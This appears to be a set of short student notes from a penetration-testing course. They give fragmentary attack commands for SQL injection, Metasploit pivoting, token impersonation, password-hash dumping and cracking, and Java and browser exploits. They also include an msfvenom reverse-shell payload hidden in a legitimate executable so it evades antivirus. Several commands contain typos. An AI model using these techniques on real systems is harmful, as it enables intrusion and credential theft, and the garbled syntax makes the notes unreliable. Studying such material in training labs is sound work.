Advanced Penetration Testing Notes

h

h

By: Zaza | Related Lesson: Linux (part 2) Kali Linux Commands | Modified: May 19, 2017

WebApp - SQL Injection

Go to Login id=2 in the address Add a single quote ?id=2’ The error log provided the SQL code id or 1 in (SELECT DB.NAME(0))  — was able to get the DB name 2 or 1=1 — #sqlmap -u ”http://192.168.1.23/bookservice/bookdetail.asp

By: rspeight10 | Related Lesson: WebApp (part 3) SQL Injection | Modified: May 18, 2017

Post Exploitation Pivoting

meterpreter> ifconfig msf exploit(ms08_067_netapi)> use auxiliary/server/sock4a msf exploit(ms08_067_netapi)> show options /opt/smbexec# nano /etc/proxychains.conf /opt/smbexec# proxychains nmap -Pn -cV -p 445,446 172.16.233.141

By: rspeight10 | Related Lesson: Post Exploitation (part 3) Pivoting | Modified: May 18, 2017

Post Exploitation

incognito meterpreter > sshexec meterpreter> list tokens -u impersonate_token BULBXP\\secret

By: rspeight10 | Related Lesson: Post Exploitation (part 2) Exploit Development | Modified: May 18, 2017

Advanced Exploitation - File Transfer

msf (exploit) > session -I 1 meterpreter> hashdump meterpreter > upload <path> C:\\ meterpreter> download cd /usr/share/metaexploit-framework/scripts/meterpreter udev, udevadm


Advanced Exploitation - Bypassing

# msfvenom -p windows/meterpreter/reverse_rcp LHOST=192.168.1.77 LPORT=-1234 -x /usr/share/windows-binaries/radmin.exe -k -f exe > rdamin.exe Need to create a listener to catch it. VirusTotal: do not upload your payload to this site

By: rspeight10 | Related Lesson: Advanced Exploitation (part 5) Bypassing Antivirus Software | Modified: May 18, 2017

Advanced Exploitation - Social

Social Engineering setoolkit (Social Engineering Tool Kit)

By: rspeight10 | Related Lesson: Advanced Exploitation (part 4) Social Engineering | Modified: May 18, 2017

Advanced Exploiting - Java

msf exploit(handler) > use exploit/multi/browser/java_signed_applet msf exploit(handler) > show options msf exploit(handler) > search appletname bulbsec msf exploit(handler) > set uripath applet msf exploit(handler) > show payloads msf

By: rspeight10 | Related Lesson: Advanced Exploitation (part 3) Exploiting Java | Modified: May 18, 2017

Client Side Attacks

msf> use exploit/windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora)> show options msf > msf exploit(ms10_002_aurora)> set uripath class msf exploit(ms10_002_aurora)> show payloads msf exploit(ms10_002_aurora)> set payload

By: rspeight10 | Related Lesson: Advanced Exploitation (part 2) Client Side Attacks | Modified: May 18, 2017

oclhashcat

Used for Gaming Machines build a password cracking box via the Cloud hashcat --help (provides a list of modes) cd /usr/share/hashcat cd /usr/share/wordlist hashcat -m 1000 DESKtop/Windows7hashes.txt -o win7caracked.txt /usr/share/wordlists/rocky

By: rspeight10 | Related Lesson: Passwords (part 4) Using oclhashcat | Modified: May 18, 2017
